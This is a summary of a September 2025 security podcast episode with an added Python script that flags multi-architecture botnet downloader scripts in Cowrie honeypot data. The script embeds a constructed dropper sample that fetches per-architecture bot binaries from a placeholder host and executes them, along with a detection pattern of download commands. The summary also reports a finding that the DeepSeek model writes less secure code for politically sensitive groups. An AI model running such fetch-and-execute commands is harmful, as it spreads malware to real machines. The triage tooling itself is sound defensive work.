
SANS Internet Storm Center Stormcast: September 19, 2025 Edition Highlights
In this September 19, 2025 edition of the SANS Internet Storm Center Stormcast, Johannes Ullrich from Jacksonville, Florida, presents several crucial topics in cybersecurity.
One of the highlights of this edition is an article written by Nathan Smith, an intern, who examines the download directory in the Cowrie honeypot. This directory can be confusing for newcomers to honeypot investigation. Smith sheds light on a common method used by malicious bots: downloading a bash script that, in turn, downloads and executes bots for different architectures, hoping to find one compatible with the victim's system. This technique is common, and recognizing it is important for sorting through honeypot data effectively.
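An added example, not code from the Stormcast, Smith's article or the Cowrie project: a small Python triage helper that flags the pattern Smith describes, a script that fetches and executes one candidate binary per architecture, so such files can be separated quickly from the rest of a download directory. The sample scripts, the placeholder host name and the architecture tag list are constructed for the illustration.

```python
import re
from pathlib import Path

# Constructed sample in the style of the multi-architecture downloader the post
# describes (not a captured script; the host name is a placeholder).
SAMPLE_DOWNLOADER = """\
#!/bin/sh
cd /tmp
wget http://example.invalid/bins/bot.x86 -O x86; chmod +x x86; ./x86
wget http://example.invalid/bins/bot.arm7 -O arm7; chmod +x arm7; ./arm7
wget http://example.invalid/bins/bot.mips -O mips; chmod +x mips; ./mips
wget http://example.invalid/bins/bot.mpsl -O mpsl; chmod +x mpsl; ./mpsl
"""

# Constructed benign script for comparison: a single fetch, no architecture sweep.
SAMPLE_BENIGN = """\
#!/bin/sh
wget http://example.invalid/config.txt -O /tmp/config.txt
cat /tmp/config.txt
"""

# Architecture tags commonly seen in the file names of such droppers (assumed list).
ARCH_TAGS = {"x86", "x86_64", "i586", "i686", "arm", "arm5", "arm6", "arm7",
             "aarch64", "mips", "mipsel", "mpsl", "ppc", "powerpc", "sh4", "m68k", "sparc"}

FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")   # download commands
EXEC_RE = re.compile(r"\./\S+")                            # "./name" execution of a fetched file

def classify_script(text: str) -> dict:
    """Heuristic triage: flag scripts that fetch and run several per-architecture binaries."""
    tokens = set(re.findall(r"[a-z0-9_]+", text.lower()))
    archs = sorted(tokens & ARCH_TAGS)
    fetches = len(FETCH_RE.findall(text))
    execs = len(EXEC_RE.findall(text))
    multi_arch = fetches >= 2 and execs >= 2 and len(archs) >= 2
    return {"fetches": fetches, "executes": execs, "architectures": archs,
            "verdict": "multi-arch downloader" if multi_arch else "other"}

def triage_directory(dl_dir: str) -> dict:
    """Classify every text file in a honeypot download directory; binaries are skipped."""
    results = {}
    for path in (p for p in Path(dl_dir).iterdir() if p.is_file()):
        data = path.read_bytes()
        if b"\x00" not in data:      # ELF payloads and other binaries are not scripts
            results[path.name] = classify_script(data.decode("utf-8", errors="ignore"))
    return results

if __name__ == "__main__":
    for name, text in (("downloader", SAMPLE_DOWNLOADER), ("benign", SAMPLE_BENIGN)):
        print(name, classify_script(text))
```

Point `triage_directory` at Cowrie's download directory to get a verdict per text file; the architecture list in each result shows which platforms the dropper was hoping to hit.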
Another topic covered is the recent SonicWall vulnerability. It has been revealed that 5% of MySonicWall accounts have been compromised by brute-force password attacks. This led to the exfiltration of backup files created by an optional backup feature that is the preferred option for some SonicWall models. Users should check their MySonicWall accounts to see if they are using this feature and follow SonicWall's recommendations, including resetting all passwords and checking affected serial numbers.
The podcast also mentions research from Cloudflare published in the Washington Post, which suggests that DeepSeek, a code model, writes less secure code for organizations associated with causes that are politically sensitive in China, such as Falun Gong or Tibet. This finding raises questions about the integrity and reliability of AI code generation, especially when it is used for politically sensitive causes.
Finally, a critical vulnerability in Google Chrome has been fixed. This vulnerability, a type confusion in Chrome's V8 JavaScript engine, has been actively exploited. Users are encouraged to restart Chrome to apply the update and ensure they are running the latest version to protect against this threat.
These insights are crucial for cybersecurity professionals and end-users, highlighting the importance of vigilance and regular updates to maintain system security.